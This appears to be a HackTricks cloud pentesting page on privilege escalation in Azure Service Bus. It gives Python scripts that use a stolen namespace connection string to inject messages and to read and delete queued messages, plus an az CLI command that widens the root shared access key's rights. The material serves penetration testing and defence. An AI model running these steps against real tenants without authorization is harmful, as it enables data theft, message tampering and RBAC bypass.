Az - Service Bus Privesc

Reading time: 5 minutes

Service Bus

For more information check:

Az - Service Bus

Send Messages. Action: Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action OR Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action

You can retrieve the PrimaryConnectionString, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow.

#You need to install the following libraries
#pip install azure-servicebus
#pip install aiohttp
#pip install azure-identity

import asyncio
from azure.servicebus.aio import ServiceBusClient
from azure.servicebus import ServiceBusMessage

# Constants
NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
TOPIC_NAME = "<TOPIC_NAME>"

# Function to send a single message to a Service Bus topic
async def send_individual_message(publisher):
    # Prepare a single message with updated content
    single_message = ServiceBusMessage("Hacktricks-Training: Single Item")
    # Send the message to the topic
    await publisher.send_messages(single_message)
    print("Sent a single message containing 'Hacktricks-Training'")

# Function to send multiple messages to a Service Bus topic
async def send_multiple_messages(publisher):
    # Generate a collection of messages with updated content
    message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)]
    # Send the entire collection of messages to the topic
    await publisher.send_messages(message_list)
    print("Sent a list of 5 messages containing 'Hacktricks-Training'")

# Function to send a grouped batch of messages to a Service Bus topic
async def send_grouped_messages(publisher):
    # Send a grouped batch of messages with updated content
    async with publisher:
        grouped_message_batch = await publisher.create_message_batch()
        for i in range(10):
            try:
                # Append a message to the batch with updated content
                grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}"))
            except ValueError:
                # If batch reaches its size limit, handle by creating another batch
                break
        # Dispatch the batch of messages to the topic
        await publisher.send_messages(grouped_message_batch)
    print("Sent a batch of 10 messages containing 'Hacktricks-Training'")

# Main function to execute all tasks
async def execute():
    # Instantiate the Service Bus client with the connection string
    async with ServiceBusClient.from_connection_string(
        conn_str=NAMESPACE_CONNECTION_STR,
        logging_enable=True) as sb_client:
        # Create a topic sender for dispatching messages to the topic
        publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME)
        async with publisher:
            # Send a single message
            await send_individual_message(publisher)
            # Send multiple messages
            await send_multiple_messages(publisher)
            # Send a batch of messages
            await send_grouped_messages(publisher)

# Run the asynchronous execution
asyncio.run(execute())
print("Messages Sent")
print("----------------------------")

Recieve Messages. Action: Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action OR Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action

You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows.

#You need to install the following libraries
#pip install azure-servicebus
#pip install aiohttp
#pip install azure-identity

import asyncio
from azure.servicebus.aio import ServiceBusClient

NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
TOPIC_NAME = "<TOPIC_NAME>"
SUBSCRIPTION_NAME = "<TOPIC_SUBSCRIPTION_NAME>" #Topic Subscription

# Function to receive and process messages from a Service Bus subscription
async def receive_and_process_messages():
    # Create a Service Bus client using the connection string
    async with ServiceBusClient.from_connection_string(
        conn_str=NAMESPACE_CONNECTION_STR,
        logging_enable=True) as servicebus_client:

        # Get the Subscription Receiver object for the specified topic and subscription
        receiver = servicebus_client.get_subscription_receiver(
            topic_name=TOPIC_NAME,
            subscription_name=SUBSCRIPTION_NAME,
            max_wait_time=5
        )

        async with receiver:
            # Receive messages with a defined maximum wait time and count
            received_msgs = await receiver.receive_messages(
                max_wait_time=5,
                max_message_count=20
            )
            for msg in received_msgs:
                print("Received: " + str(msg))
                # Complete the message to remove it from the subscription
                await receiver.complete_message(msg)

# Run the asynchronous message processing function
asyncio.run(receive_and_process_messages())
print("Message Receiving Completed")
print("----------------------------")

Microsoft.ServiceBus/namespaces/authorizationRules/write & Microsoft.ServiceBus/namespaces/authorizationRules/write

If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC).

az servicebus namespace authorization-rule update \
    --resource-group <MyResourceGroup> \
    --namespace-name <MyNamespace> \
    --name RootManageSharedAccessKey \
    --rights Manage Listen Send

References

• https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
• https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
• https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
• https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
• https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus